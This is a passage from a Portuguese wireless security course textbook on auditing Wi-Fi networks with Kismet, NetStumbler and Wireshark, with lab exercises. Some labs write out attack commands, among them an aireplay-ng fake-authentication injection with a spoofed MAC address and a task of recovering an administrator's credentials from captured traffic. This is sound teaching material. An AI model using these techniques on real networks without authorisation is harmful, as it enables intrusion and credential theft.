Após obter a autorização da diretoria, você executa os procedimentos de auditoria e detecta


uma falha que pode possibilitar o vazamento de informações. Explica-se: ao fazer a auditoria
e verificar o tráfego da rede, você conseguiu obter vários dados de um administrador de redes
que, naquele momento, acessou a interface web de administração de um Access Point via Wi-Fi.
Entre os dados coletados estavam o nome de usuário e senha de acesso do administrador.

O arquivo PCAP capturado durante a auditoria está disponível em /root/Desktop/SEG6/http_leak.pcap.


Analise o arquivo e responda às perguntas:

1. Qual é o SSID da rede Wi-Fi?

2. Qual é o canal utilizado pela rede?

3. Qual é o endereço IP da máquina utilizada pelo administrador de redes?

4. Qual é o endereço IP do AP?

5. Qual é o Sistema Operacional utilizado pelo administrador de redes?

6. Qual é o servidor web utilizado pelo Access Point?

7. É possível descobrir qual é o Access Point (marca ou modelo)?

8. Qual é o usuário e senha para acessar a interface de administração web do Access Point?

Capítulo 3 - Roteiro de Atividades

65
66
Segurança em Redes sem Fio
4
Auditoria em redes sem fio
(parte 2)
objetivos

Apresentar algumas metodologias de auditoria de redes sem fio e as principais


ferramentas livres disponíveis; mapear e ensinar estratégias de auditorias com
GPS e redes sem fios.

conceitos
Auditoria em redes sem fio; ferramentas de auditoria.

Introdução
11 Metodologias de auditoria. q
11 Ferramentas de auditoria.

11 Mapeando com Global Positioning System (GPS).

Neste capítulo, abordaremos técnicas e ferramentas de auditoria de redes sem fio. Aborda-
remos o mapeamento com uso de Global Positioning System (GPS), possível de ser realizado
por ferramentas livres ou comerciais. Nosso enfoque estará em NetStumbler e Kismet,
ferramentas livres disponíveis para Windows e Linux, respectivamente.

Exercício de nivelamento 1 e
Ataques a redes sem fio
Capítulo 4 - Auditoria em redes sem fio (parte 2)
Quais são os principais tipos de ataques a redes sem fio?

Metodologias de auditoria
Auditoria contra determinada política. q
11 Antes:

22 Política em mãos, dados já coletados.

22 Conhecer os equipamentos típicos, marcas de produtos.

22 Autorização.

67
11 Buscar desvios: q
22 Cláusulas da política de segurança não obedecidas.

22 Correlacionar dados coletados com a política de segurança.

É importante lembrar que uma auditoria é feita em relação a uma determinada política.
Assim, o auditor deve ter pleno acesso à política da organização, de forma que possa avaliar
corretamente quais são os desvios com relação à norma. Embora a auditoria de redes sem
fio normalmente não envolva acesso, é importante que se tenha autorização prévia da
gerência do setor auditado.

O código de práticas ISO/IEC 17799:2005 conta com alguns controles que citam redes sem
fio de maneira explícita:

11 10.6.1 Network Controls (Network Security Management);

11 10.8.1 Information exchange policies and procedures (Exchange of information);

11 11.4.2 User authentication for external connections (Network access control);

11 11.4.5 Segregation in networks (Network access control);

11 11.7.1 Mobile computing and communications (Mobile computing and teleworking);

11 11.7.2 Teleworking (Mobile computing and teleworking).

Nem sempre redes e dispositivos sem fio estão incluídos na política de segurança q
adotada. Outros objetivos de uma auditoria:

11 Identificar APs e clients.

11 Configuração.

11 Mapear abrangência da rede.

11 Avaliar o grau de divulgação de informações da organização.

Nem sempre a organização possui uma política de segurança. Mesmo quando implantada,
é comum que não existam requisitos de segurança em dispositivos móveis e redes sem fio.
A implantação completa de uma política de segurança para redes e dispositivos sem fio
envolve a política implantada, monitoramento e auditoria. Outros objetivos de uma audi-
toria, seja feita contra uma determinada política ou não:

11 Identificar APs e clientes: a auditoria permite que o administrador conheça os APs e


clientes ativos na área da empresa. Conhecer esses dados permite a adoção de medidas
contra APs “rogue” e falsos – que se fazem passar por APs da empresa, por exemplo;

11 Configuração: o resultado de uma auditoria pode atestar que a empresa adota meca-
nismos de segurança considerados bons na WLAN, da mesma forma que pode provar
que o mecanismo determinado pela política não foi adotado. Um AP com senha-padrão
ou uma rede configurada com WEP em vez de WPA são exemplos de desvios, se uma
política estiver implantada;
Segurança em Redes sem Fio

11 Mapear abrangência da rede: mapear a abrangência da rede, atividade também conhe-


cida como site survey, possui dois objetivos básicos: conhecer a distribuição de canais na
área de abrangência da organização e conhecer a abrangência da rede;

11 Avaliar o grau de divulgação de informações da organização: avaliar a presença de


redes “rogue” na organização que usam mecanismos de segurança fracos (WEP ou WPA
com chave fraca) ou mesmo nenhum mecanismo. Redes que permitem o acesso não
autorizado, captura e deciframento de tráfego permitem também que informações da
organização sejam divulgadas.

68
Fingerprinting do AP
Passivo: q
11 Não há necessidade de estar conectado à rede.

11 Identificar o fabricante:

22 Organization Unique Identifier (OUI) da interface de rede.

22 Alocado pelo IEEE.

22 Útil apenas em tráfego unicast e broadcast.

11 Identificar informações proprietárias divulgadas nos quadros beacon.

Ativo:

11 Necessidade de conexão.

11 Conectar-se ao AP remotamente (SSH e servidor web).

Fingerprinting passivo

w O fingerprinting passivo do Access Point pode ser feito a partir do tráfego de gerenciamento
e controle coletado. Conforme tratado no Capítulo 3, para a coleta desse tipo de dado é
A lista de prefixos
disponíveis está em necessário que o driver da interface de rede permita o modo “monitor” (RFMON). Mais
“IEEE OUI and adiante, veremos que os endereços MAC podem revelar informações mais interessantes
Company_id
quando o tráfego é multicast.
Assignments
(Pesquisa)” e “IEEE OUI
O endereço MAC possui 6 bytes (48 bits), normalmente separados por hífen (-) ou por dois
and Company_id
Assignments”: http:// pontos (:) e expressos em base hexadecimal. Os três primeiros são únicos por fabricante e
standards.ieee.org/ alocados pelo IEEE.
regauth/oui/oui.txt
Utilitários como NMAP e Wireshark fazem uso dessa lista para identificar o fabricante da inter-
face de rede. Outra fonte de informações que pode ser obtida passivamente está nos quadros
de gerenciamento, mais especificamente nos beacons. Interfaces da Broadcom, presentes em
APs Linksys, incluem “tagged tags” específicos nos quadros de gerenciamento. Outra maneira
de identificar a marca é a maneira como SSIDs ocultos aparecem, ou seja, com nenhum valor
(Linksys), 6 ou mais bytes nulos (0x00 – Cisco), ou como um espaço (0x20 – Enterasys).

Fingerprinting ativo
A identificação ativa, diferentemente da passiva, envolve conexão no AP para obter texto
com informações e versões do equipamento (banner). Sua grande desvantagem está na
detecção da auditoria no momento da conexão do auditor.
Capítulo 4 - Auditoria em redes sem fio (parte 2)

Como veremos adiante, ferramentas de auditoria também podem ser ativas. NetStumbler
identifica redes de maneira ativa e não é indicado caso o auditor deseje conduzir uma audi-
toria “silenciosa” aos administradores da rede.

Processamento de informações coletadas


11 Gerar planilhas com arquivos XML e CSV gerados pelo Kismet. q
11 Identificar redes com segurança fraca.

11 Informações úteis.

11 SSIDs usados, marcas de interfaces, potência do sinal e nível de ruído, entre outros
indicadores.

69
Processar os dados gerados por ferramentas de auditoria como Kismet e NetStumbler
é uma boa opção para a geração de gráficos de nível gerencial. A partir de arquivos em
formato XML (Extensible Markup Language) e CSV (Comma-Separated Values), é possível
gerar gráficos com informações importantes para quem implementou ou vai implementar
uma WLAN:

11 Incidência de “rogue” APs;

11 Distribuição de canais;

11 Distribuição de mecanismos de segurança;

11 Número de clientes por AP, entre outros.

Identificação de métodos de segurança


Automaticamente: q
11 Ferramentas como Kismet.

Manualmente:

11 Captura e filtro de quadros não interessantes.

22 Beacon.

22 Probe request.

22 Probe response.

11 Análise com analisadores de tráfego como Wireshark.

A ferramenta Kismet, que utilizaremos na prática, é capaz de identificar vários métodos de


segurança. WEP é identificado explicitamente pelo parâmetro “WEP”:

11 Yes: indica um Basic Service Set (BSS) com WEP;

11 No: indica um BSS sem WEP;

11 Other: indica um BSS com um mecanismo diferente de WEP.

Kismet é capaz de identificar vários mecanismos de autenticação 802.1x:

11 EAP-TLS;

w
11 LEAP;

11 PEAP.
Mais informações em
Convém lembrar que a ferramenta precisa capturar certa quantidade de quadros para “Kismet Readme
caracterizar um BSS. Kismet também pode identificar redes que cifram os dados mas não Configuration”:
http://www.kismetwire-
marcam a flag WEP nos quadros. Isto pode ser feito com a habilitação da opção “fuzzycrypt”.
less.net/documenta-
tion.shtml#readme
A análise manual será tratada com uso da ferramenta Wireshark nas atividades práticas
deste capítulo.

Mapeamento externo
Segurança em Redes sem Fio

11 Mapear alcance da rede. q


11 Útil para identificar a provável área de ataque.

11 Não leva em consideração atacante melhor equipado.

22 Antena de alto ganho.

11 Latitude e longitude de cada pacote.

22 Receptor GPS.

70
Um dos aspectos mais interessantes do mapeamento externo é a possibilidade de mapear
o alcance das redes com o uso de coordenadas de latitude e longitude. Esse tipo de
GPS auditoria é possível com o auxílio de um receptor Global Positioning System (GPS) que,
Sistema de navegação associado ao software de auditoria, informa as coordenadas geográficas de cada pacote
por satélite que fornece recebido. Tanto Kismet quanto NetStumbler permitem a associação com um receptor GPS
a um aparelho móvel
sua posição, assim para geração de mapas.
como informação
horária, sob todas É conveniente lembrar que um atacante equipado com uma interface com boa sensi-
condições atmosféricas,
a qualquer momento bilidade e antenas de alto ganho pode mapear redes a partir de pontos distantes do
e em qualquer lugar centro da rede (localização do AP).
na Terra, desde que o
receptor se encontre
no campo de visão de
quatro satélites GPS. Mapeamento interno
Pode ser associado com mapas internos da organização. q
GPS não é possível.

11 Necessidade de visada do céu para recepção dos sinais dos satélites.

Conectividade depende da qualidade do sinal.

11 Signal to Noise Ratio (SNR).

11 Mínimo entre ~4 dB (conexão a baixa velocidade) e 20 dB.

O mapeamento do ambiente interno de uma organização não pode ser associado a um


receptor GPS, uma vez que é necessária a visada dos satélites para a determinação das
coordenadas. Para mapear espaços internos usam-se ferramentas de software proprietá-
rias que tenham como entrada um blueprint (mapa esquemático) da área construída.
O auditor indica no software em que ponto do mapa está para que o software seja capaz de
determinar a escala e as distâncias envolvidas. Alguns equipamentos profissionais para
redes sem fio disponibilizam softwares com capacidade de gerenciar o nível do sinal do
ambiente interno. Essa informação, associada a uma planta baixa do ambiente, provê a
Figura 4.1
Tela de captura do visualização da cobertura Wi-Fi no local. Um exemplo de software com essa capacidade é o
AirWave. AirWave (Aruba Networks: www.arubanetworks.com).

Capítulo 4 - Auditoria em redes sem fio (parte 2)

71
O mapeamento interno é importante na avaliação da necessidade de novos APs – clientes
normalmente exigem um nível de SNR (Signal to Noise Ratio) mínimo de 4 dB para associação.

Avaliação do tráfego
Tráfego não cifrado. q
11 Quadros de dados são cifrados em redes com segurança ativa.

11 WEP e WPA (TKIP) podem ser decifrados.

22 Kismet – WEP decifrado em tempo real.

11 Ferramentas de análise de tráfego Ethernet são aplicáveis.

22 Wireshark, Snort e TCPdump.

11 Divulgação de informações.

22 Análise de tráfego capturado em formato PCAP com utilitários strings e


display filter Wireshark.

É possível avaliar o nível de informações da organização que são divulgadas pela análise
do tráfego da rede. Isso pode ser feito por intermédio de analisadores de pacotes, como
Wireshark, Snort e TCPdump.

Convém lembrar que, numa rede com um mecanismo de segurança implantado, os quadros
802.11 de dados são cifrados. Assim, só é possível analisá-los depois de decifrados. Hoje, os
únicos mecanismos de segurança que permitem que se decifre tráfego previamente capturado
são WEP e WPA (TKIP). Kismet permite que o tráfego WEP seja decifrado em tempo real, uma
vez que a chave seja conhecida.

Ferramentas como strings (úteis para identificar cadeias de texto dentro de arquivos binários,
como o de captura) e Wireshark são úteis para a identificação do tipo de informações divul-
gadas pela rede.

Avaliação de tráfego cifrado


Cabeçalho 802.2 (LLC) marca o início do payload, portanto cifrado. q
Kismet:

11 Identifica tráfego cifrado na ausência dos bytes 0xAA 0xAA, que caracterizam
o cabeçalho LLC.

11 Fuzzy Encryption Detection (configuração fuzzycrypt).

11 Flag WEP não é o único indicador.

WEP:

11 É possível decifrar sem a chave, em alguns casos.

Hoje, muitos administradores de rede já implementam mecanismos de segurança, por isso


Segurança em Redes sem Fio

é bem provável que você, como auditor, não encontre redes abertas, sem algum mecanismo
de segurança. Assim, a ferramenta de auditoria deve ser capaz de identificar adequada-
mente as redes com mecanismo de segurança.

A presença da flag WEP nos quadros não é o único indicador com mecanismo de segurança
ativado. Kismet é capaz de identificar redes com segurança por meio dos principais indica-
dores. Por exemplo:

11 Quadros de dados são cifrados. Assim, se não existem os bytes “0xAA 0xAA”, que carac-
terizam o cabeçalho LLC em um quadro de dados, o quadro passou por algum tipo de
proteção, possivelmente por um mecanismo de segurança;
72
11 Quadros de dados cifrados deveriam, por padrão, ter a flag WEP marcada, mas isso nem
sempre acontece. A opção “netfuzzycrypt” faz com que Kismet tente detectar redes
com segurança;

11 É possível, ainda, decifrar tráfego WEP em alguns casos, como veremos adiante.

Análise da camada MAC


Sempre trafega em claro (não cifrada). q
w Endereço multicast de destino revela pistas sobre protocolo usado.

Saiba mais em “IPv4 11 01-00-5E-00-00-00 a 01-00-5E-7F-FF-FF alocado pela IANA para Multicast Internet.
Multicast Address
Space Registry” e 11 01-00-5E-00-00-05 = 224.0.0.5.
“Ethernet Number” no
Outra maneira de se analisar tráfego cifrado é por meio da análise dos endereços da camada
site http://www.iana.org
MAC. A presença do endereço de destino multicast pode revelar pistas sobre o protocolo
usado, de acordo com intervalos determinados pela IANA.

Avaliação de tráfego cifrado


Histograma dos quadros: q
11 Analisa a frequência de um byte no intervalo capturado.

11 Selecionar apenas quadros de dados (payload cifrado).

11 PCAPHistogram.

22 Ferramenta desenvolvida por Joshua Wright, do SANS Institute.

É possível que uma empresa adote um mecanismo de segurança próprio para cifrar os
pacotes. Mas como realizar essa detecção?

É possível determinar se um tráfego é cifrado ou não pela análise da ocorrência de carac-


teres em um tráfego. O tráfego cifrado possui, como características básicas, a aleatoriedade
e a não repetição de caracteres. A ferramenta PCAPHistogram, desenvolvida por Joshua
Wright (SANS Institute) indica, por meio de gráficos, a frequência de bytes – pontos bem
distribuídos no gráfico indicam tráfego possivelmente cifrado, enquanto que pontos pouco
distribuídos indicam tráfego possivelmente aberto.

Exercício de fixação 1 e
Metodologias de auditoria
Quais as principais diferenças entre fingerprinting passivo e o fingerprinting ativo? Capítulo 4 - Auditoria em redes sem fio (parte 2)

Ferramentas de auditoria
Principais ferramentas de auditoria: q
11 TCPdump.

11 Airodump-ng.

11 Wireshark.

11 NetStumbler (Windows).

73
11 Kismet. q
22 Linux apenas, versão Windows em desenvolvimento.

11 Outras ferramentas.

22 Auditorias específicas de mecanismos de segurança, como WEP, WPA, entre outras.

Algumas ferramentas foram e serão muito mencionadas no decorrer deste curso, e a


principal delas é o Kismet, que agrega diversas funcionalidades em uma única ferramenta
de auditoria. NetStumbler, embora seja bem limitado em funcionalidades se comparado ao
Kismet, é uma boa opção para auditorias baseadas em Windows.

Outras ferramentas genéricas de análise também são usadas:

11 TCPdump: tradicional analisador de pacotes baseado em texto. Suas diversas opções de


filtros e exibição podem ajudar em algumas análises.

11 Airodump-NG: ferramenta Linux para captura específica de tráfego 802.11, parte do


pacote AIRCRACK-NG.

11 Wireshark: considerado a versão gráfica de TCPdump, oferece diversas funcionalidades


de exibição, filtro e captura de tráfego. Possui o diferencial de permitir o deciframento de
tráfego WEP, uma vez que seja fornecida a chave.

No decorrer deste curso, serão apresentadas outras ferramentas para cenários específicos,
como mecanismos de segurança WEP e WPA.

Wireshark
11 Poderoso analisador de tráfego que possui uma interface de visualização de pacotes q
mais amigável que a do comando TCPdump.

11 Estrutura em árvore, resolução de hostname/porta/MAC, possibilidade de visuali-


zação de fluxos.

11 Dependente da biblioteca Libpcap ou Winpcap, captura tráfego e abre arquivos de


captura PCAP.

11 Interoperabilidade com TCPdump, Airodump-ng, Kismet e outras ferramentas.

11 Filtros de captura no mesmo formato usado por TCPdump, filtros de exibição.

Wireshark (antigo Ethereal até 2006) é uma ferramenta tradicional de análise de tráfego
que também é de grande utilidade para WLAN. É capaz de lidar com arquivos PCAP, possui
formato compatível com diversas outras ferramentas como TCPdump e revela mais informa-
ções do que esta última ferramenta, por apresentar os dados na forma de árvore, decodi-
ficar tráfegos conhecidos, entre outros recursos.

Convém lembrar que, com a interface em modo “managed”, qualquer ferramenta será capaz
de capturar apenas tráfego 802.3 (Ethernet aparente). Para capturar tráfego 802.11 + 802.2
Segurança em Redes sem Fio

(LLC), é necessário que a interface esteja em modo “monitor” ou RFMON, o que, atualmente,
é possível apenas com os drivers Linux.

Wireshark conta com um utilitário de linha de comando, o twireshark. Abordaremos mais


detalhes de ambas as versões na prática deste capítulo.

74
Figura 4.2 Wireshark permite a visualização dos pacotes de maneira hierárquica, camada a camada.
Tela do Wireshark. Esse tipo de visualização, aliado a recursos de agrupamento de fluxos e decodificação –
inclusive de tráfego WEP, desde que se conheça a chave – são diferenciais dessa ferramenta
que a tornaram líder. Convém lembrar que Wireshark depende da biblioteca de captura de
pacotes Libpcap ou Winpcap. Sob a plataforma Windows, o instalador já inclui a última
versão de Winpcap.

Para pensar

É conveniente lembrar que Wireshark não é uma ferramenta apropriada para


análise de arquivos capturados excessivamente grandes, devido aos recursos de
hardware exigidos. Para a análise de arquivos de captura grandes, é possível dividir
o arquivo de captura original em outros menores (a ferramenta Editcap é parte do
pacote) ou mesmo usar uma ferramenta que exige menos recursos de hardware,
como TCPdump ou tshark. Capítulo 4 - Auditoria em redes sem fio (parte 2)

Kismet
11 Diversas funções como Wardriving, site survey, IDS distribuído, auditoria, detecção de q
APs “rogue” e detecção de IVs duplicados em redes com WEP.

11 Interação com GPS para mapeamento.

11 Driver próprio, mais de 20 tipos de NIC suportados.

11 Suporte ainda limitado aos principais chipsets.

11 Restrito a Unix, com diversas dependências.

22 GPSD, ImageMagick, Expat e GMP.

11 Possibilita a captura em todos os canais simultaneamente.

75
Kismet é a ferramenta livre que oferece mais recursos ao auditor. Além de exibir informa-
ções sobre as redes em um nível de detalhes maior do que ferramentas como NetStumbler
e Kismet, tem um diferencial essencial: audita redes com a interface em modo “monitor”,
ou seja, não envia pacotes de probe como NetStumbler e outras. A auditoria em modo
“managed”, o mesmo usado na associação, é “barulhenta” e permite que se detecte a pre-
sença de um cliente através de investigação na área.

Kismet oferece a possibilidade de captura associada com um receptor GPS, o que permite
a geração posterior de mapas, como o NetStumbler. Outra característica interessante de
Kismet é a possibilidade de gerar dados da auditoria em diversos formatos, o que permite
a visualização tanto por ferramentas simples (como Excel) quanto por utilitários que geram
mapas mais complexos dos dados gerados.

Uma característica interessante de Kismet é a possibilidade de usá-lo como ferramenta de


IDS wireless por meio do recurso de drones. Com isso, é possível instalar sensores Kismet que
reportam a um servidor central, possibilitando a captura em diversos pontos da organização.

Finalmente, Kismet permite a captura de todos os canais simultaneamente (inclusive o canal 14),
através da utilização de sensores drone ou de diversas interfaces de rede.

A interface gráfica de Kismet é simples, mas conta com diversos filtros e métodos de orde-
nação. Algumas funcionalidades:

11 Filtros por BSSID, SSID, contagem de pacotes, potência do sinal e presença de WEP;

11 Possibilidade de agrupar redes;

11 Visualização de estatísticas, conteúdo dos pacotes em tempo real (dump): útil para
análise de divulgação de informações sensíveis em uma rede sem fio desprovida de
mecanismos de segurança;

11 Estatísticas;

11 Informações detalhadas sobre as redes, possibilidade de visualizar clientes associados a


um determinado ESS.

NetStumbler
11 Ferramenta mais popular, restrita ao Windows, com diversas funções: q
11 Configuração da sua rede, detecção de interferência, APs não autorizados (rogue),
wardriving (suporte a GPS).

11 Auditoria ativa, detectável por probes.

11 Limitado, se comparado ao Kismet.

11 RFMON ausente sob Windows.

11 Bom suporte a NICs em Windows. w


Veja a lista de
11 “Barulhento”. compatibilidade do
Segurança em Redes sem Fio

NetStumbler: http://
O suporte a NetStumbler é bom, pois dificilmente se encontra uma interface não suportada. www.stumbler.net/
A interface opera em modo “managed”, como um cliente da WLAN. Enquanto a ferramenta compat/ e uma página
com comparação de
é utilizada, não é possível a associação a um AP. A ferramenta interrompe o serviço Wireless
hardware: http://www.
Zero Configuration (WZCSVC) durante sua execução, caso não sejam utilizados drivers seattlewireless.net/
proprietários da NIC. HardwareComparison

76
Ao contrário do Kismet, o NetStumbler é “barulhento”: a identificação de redes ocorre pelo
envio de probes com a interface em modo “managed”. Isso torna o cliente que realiza a
auditoria visível para um administrador que use Kismet para detectar atacantes. Kismet, por
Figura 4.3
Tela do sua vez, não transmite um único pacote em suas auditorias, porque configura a interface de
NetStumbler. rede para modo “monitor”, capaz de capturar dados de qualquer rede em um dado canal.

GPSMAP
11 Utilitário que integra o pacote Kismet. q
11 Diversos tipos de mapa.

11 Abrangência, potência, área de cobertura estimada, entre outros.

11 Permite filtros, útil para ocultar redes irrelevantes.

11 Estima o centro da rede.

Um dos aspectos mais interessantes de Kismet é a possibilidade de gerar gráficos da área de


abrangência de cada AP. Isso é possível com o uso de um receptor GPS compatível durante
a auditoria, que marca cada pacote com dados de latitude e longitude no instante da
captura. O próprio Kismet oferece uma ferramenta para a geração de gráficos, GPSMAP, mas
Capítulo 4 - Auditoria em redes sem fio (parte 2)

hoje é de pouca utilidade para auditorias no Brasil, porque os sites usados como fonte de
mapas não possuem boa cobertura. Existem ferramentas que permitem visualizações mais
modernas de mapas, como o Google Earth.

77
O mapa anterior foi gerado a partir do utilitário GPSMAP de Kismet, durante uma auditoria Figura 4.4
feita no centro de Los Angeles. As cores exibidas indicam o nível de segurança da rede: Mapa feito com o
utilitário GPSMAP
verde para redes seguras e vermelho para inseguras. do Kismet. Centro
de Los Angeles,
outubro de 2005.
Segurança em Redes sem Fio

78
Roteiro de Atividades 4
Atividade 4.1 – NetStumbler no Windows e suas funcionalidades
Nesta atividade, executaremos o NetStumbler e vamos nos familiarizar com a sua interface
e os seus comandos.

Execute o NetStumbler no Windows por meio do menu “Iniciar”. Verifique as funções do


NetStumbler: configuração da sua rede, detecção de interferência, APs não autorizados,
suporte a GPS, filtros, entre outras. Relembrando, o NetStumbler pode ser utilizado para:

11 Verificar se a configuração de sua rede está de acordo com o planejado;

11 Localizar locais com falhas de cobertura em suas WLANs;

11 Detectar outras WLAN que podem estar causando interferência em sua rede;

11 Detectar “rogue” AP em seu local de trabalho;

11 Auxiliar o posicionamento de antenas direcionais em links WLAN;

11 Uso em Wardriving (limitado).

Utilize as funcionalidades do NetStumbler que foram apresentadas pelo instrutor e procure


entender o seu funcionamento.

Atividade 4.2 – Kismet no Linux e suas funcionalidades


Nesta atividade, executaremos o Kismet e vamos nos familiarizar com a sua interface e os
seus comandos. Kismet é um analisador de redes sem fio do padrão IEEE 802.11 (camada 2),
sniffer e Intrusion Detection System (IDS).

O Kismet pode ser usado com qualquer interface de rede sem fio que suporte o modo
monitor (RFMON), podendo capturar, passivamente, os tráfegos 802.11a, b ou g.

Execute o Kismet por intermédio da linha de comando ou através das opções de aplica-
tivos do BackTrack 5 (“Backtrack” > “Information Gathering” > “Network Analysis” > “WLAN
Analysis” > “kismet”). Para executar na linha de comando, utilize:

# kismet

Observe a tela inicial de captura do Kismet. Nela, é possível visualizar as redes que foram
detectadas passivamente (modo monitor) pela placa de rede wireless, além do canal que
cada rede usa, o tipo de rede (A, B ou G) e também se existe segurança habilitada, entre
outras informações.
Capítulo 4 - Roteiro de Atividades

A interface do Kismet possui três áreas distintas. A central e maior delas contém as infor-
mações sobre as redes detectadas. A da direita possui informações estatísticas gerais, o(s)
driver(s) da(s) placa(s) que monitora e os canais que estão sendo monitorados. A inferior
possui os alertas e eventos que ocorrem em tempo real, tais como: detecção de uma nova
rede, alerta do IDS, salvamento dos dados etc.

Tecle “h” e visualizaremos as opções do Kismet e as informações gerais sobre a interface e


suas opções (T, A, P, H, W, Y, N e Ch).

79
Opções Tecla

List Kismet servers e

Toggle fullscreen zoom on network view z

Toggle muting of sound and speech m

Tag (or untag) selected network t

Group tagged networks g

Ungroup current group u

Show clients in current network c

Lock channel hopping to current channel L

Return to normal channel hopping H

Expand or collapse groups +/-

Force a screen redraw ^L

Help h

Name current network n

Detailed info about current network i

Sort network list s

Show wireless card power levels l

Dump printable strings d

Packet rate graph r

Statistics a

Dump packet type p

Follow network centre f

Track alerts w

Close popup window x

Quit Q

Abaixo da opção “T”, as seguintes opções estão disponíveis:

Código Tipos de Redes ou Clientes

P Probe request – no associated connection yet


Segurança em Redes sem Fio

A Access point – standard wireless network

H Ad-hoc – point to point wireless network

T Turbocell – Turbocell aka Karlnet or Lucent Router

G Group – Group of wireless networks

D Data – Data only network with no control packets

80
Abaixo da opção “W” as seguintes opções estão disponíveis:

Código Tipo de Criptografia

N No encryption in use

Y WEP encryption on use

O Other encryption in use (por exemplo: LEAP e WPA)

Tecle “s” e selecione de que forma desejamos que as redes sejam apresentadas na interface
gráfica.

Escolha por: tecla

Channel c

First time seen f

Latest time seen l

SSID s

Packet count p

Signal power level Q

WEP w

As cores apresentadas na interface gráfica, para as redes descobertas, possuem o seguinte


significado:

Cor Tipo de Rede ou Cliente

Amarelo Unencrypted Network

Vermelho Factory default settings in use

Verde Secure Networks (WEP, WPA etc.)

Azul SSID cloaking on/Broadcast SSID disabled

Selecione uma das redes e tecle “i” para informações detalhadas sobre a rede selecionada.
A tecla “L” (lock) força o Kismet a monitorar apenas um canal selecionado de determinada
rede, o que aumenta a o número de pacotes capturados naquele canal específico. A tecla “H”
retorna para o salto entre canais, ou seja, todos os canais são varridos em sequência.

O Kismet, conforme captura o tráfego 802.11, salva as informações das redes, clientes e
quadros obtidos em diversos formatos:

11 .dump: todo o tráfego capturado no formato libcap;


Capítulo 4 - Roteiro de Atividades

11 .network: resumo em formato texto das informações das redes e clientes observados;

11 .xml: arquivo em formato XML;

11 .csv: informações observadas, separadas por “;”, para aplicações de banco de dados;

11 .gps: coordenadas GPS para a captura do Kismet para uso do GPSMAP;

11 .cisco: arquivo txt com informações de CDP (Cisco Data Protocol);

11 .weak: arquivo em formato libpcap contendo pacotes WEP que podem ser analisados
pelo Airsnort.

81
Verifique a captura do arquivo .dump, copiado para o pendrive ou partição pelo aplicativo
Wireshark, conforme a prática anterior.

Utilize as funcionalidades do Kismet que foram apresentadas pelo instrutor e procure entender
o seu funcionamento. Outras opções de execução podem ser realizadas. Verifique-as através
do comando:

# man kismet

Atividade 4.3 – Demonstração de injeção de tráfego na rede


Nesta atividade utilizaremos o Wireshark para demonstrar uma injeção de tráfego na rede.
Em uma auditoria, essa atividade pode demonstrar a capacidade de se injetar tráfego em
uma rede sem fio.

Exploraremos a rede sem fio do laboratório (SSID: ESR-SEG6, Canal: 8).

Configurar a interface em modo monitor no canal 8:

# airmon-ng start wlan0 8

Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy0]

(monitor mode enabled on mon0)


Figura 4.5
Iniciar o Wireshark para visualizar a injeção de tráfego. Utilizaremos a interface mon0 para Identificando a
captura, como podemos ver na figura a seguir: interface.
Segurança em Redes sem Fio

82
Realizar uma injeção de uma tentativa de autenticação utilizando um endereço MAC fictício
(00:11:22:33:44:55) em uma rede aberta. Essa injeção será realizada com o comando aireplay-ng:

# aireplay-ng -1 10 –e ESR-SEG6 –a 00:18:39:C8:B5:4A –h


00:11:22:33:44:55 mon0

00:11:22:33:44:55 mon0

The interface MAC (00:1E:E5:FF:84:2A) doesn’t match the specified


MAC (-h).

ifconfig mon0 hw ether 00:11:22:33:44:55

21:27:12 Waiting for beacon frame (BSSID: 00:18:39:C8:B5:4A) on


channel 8

21:27:12 Sending Authentication Request (Open System) [ACK]

21:27:12 Authentication successful

21:27:12 Sending Association Request [ACK]

21:27:12 Association successful :-) (AID: 1)

Aqui podemos visualizar, pelo log do aireplay-ng, que a associação forjada foi bem-sucedida.

Opções do comando aireplay-ng:

11 -1: opção para ataque do tipo “fakeauth” (uma tentativa de autenticação ao AP);

11 10: quantidade de tentativas de autenticação realizadas;

11 -e SSID: especifica o SSID da rede explorada;

11 -a MAC: especifica o endereço MAC (BSSID) do AP explorado;

11 -h MAC: especifica o endereço MAC do cliente que forjará a autenticação

11 mon0: interface utilizada para injeção de pacotes.

Visualizar na tela no Wireshark o sucesso da autenticação e o endereço MAC forjado:

Capítulo 4 - Roteiro de Atividades

83
Figura 4.6
Visualizando o
resultado.
Segurança em Redes sem Fio

84
5
Redes rogue e ataques DoS
Apresentar ameaças inerentes a redes sem fio antes de ataques aos dispositivos
objetivos

de segurança e o conceito de redes sem fio não autorizadas (redes rogue); mostrar
o risco constante de ataques de negação de serviço (DoS) e maneiras de proteger
a rede contra tais riscos.

conceitos
Redes rogue Fingerprinting do AP e ataques de negação de serviço em redes 802.11s.

Introdução
11 Rede rogue é qualquer Wireless Access Point (WAP) instalado sem a permissão do q
administrador de rede.

11 Denial of Service (DoS): ocorre quando o cliente é incapaz de manter associação com
um AP.

Neste capítulo, abordaremos duas ameaças constantes às redes wireless: redes rogue e
ataques de negação de serviço, estes últimos mais conhecidos por sua sigla em inglês, DoS
(Denial of Service).

Na primeira parte do capítulo, abordaremos algumas técnicas de identificação de disposi-


tivos rogue, com foco na localização do transmissor e na correlação entre a rede sem fio e a
rede cabeada à qual ela está conectada por intermédio do Access Point.

Na segunda parte do capítulo, abordaremos ataques DoS contra redes sem fio, bem como
algumas medidas de defesa contra esse tipo de ataque. Esse tipo de ataque é inerente à
especificação 802.11, que permite que sejam forjados pacotes de desassociação e desauten-
Capítulo 5 - Redes rogue e ataques DoS

ticação, com o intuito de forçar um cliente ou um AP a terminar a associação.

Exercício de nivelamento 1 e
Redes rogue
O que são redes rogue?

85
Problemas agravantes
11 WAP instalado com a permissão do administrador, mas indevidamente configurado. q
11 Permite acesso à rede interna cabeada.

11 Perda do controle do perímetro da rede.

Não há perímetro quando se fala em redes sem fio. Redes rogue normalmente são definidas
como redes não autorizadas. Entretanto, muitas vezes o Access Point possui autorização dos
administradores de rede para operar, mas não é devidamente configurado.

A instalação desse tipo de dispositivo invalida qualquer tentativa de delimitação do perímetro


da rede, uma vez que:

11 A rede não permite o controle do acesso ao meio de transmissão, como nas redes cabeadas;

11 Sem os filtros de firewall definidos pela política da empresa e por mecanismos de segu-
rança, esse elemento da rede abre uma brecha no perímetro – um perímetro aberto não
é um perímetro.

Tipos de rogue
11 Amigável. q
11 Malicioso.

11 Não intencional.

Existem, basicamente, três tipos de ameaças rogue:

11 Rogue amigável: tipicamente instalado por um usuário que instala um AP SOHO (Small
Office/Home Office) ou configura sua estação como AP, sem a devida preocupação com
segurança. Envolve a infração da política de segurança por um usuário;

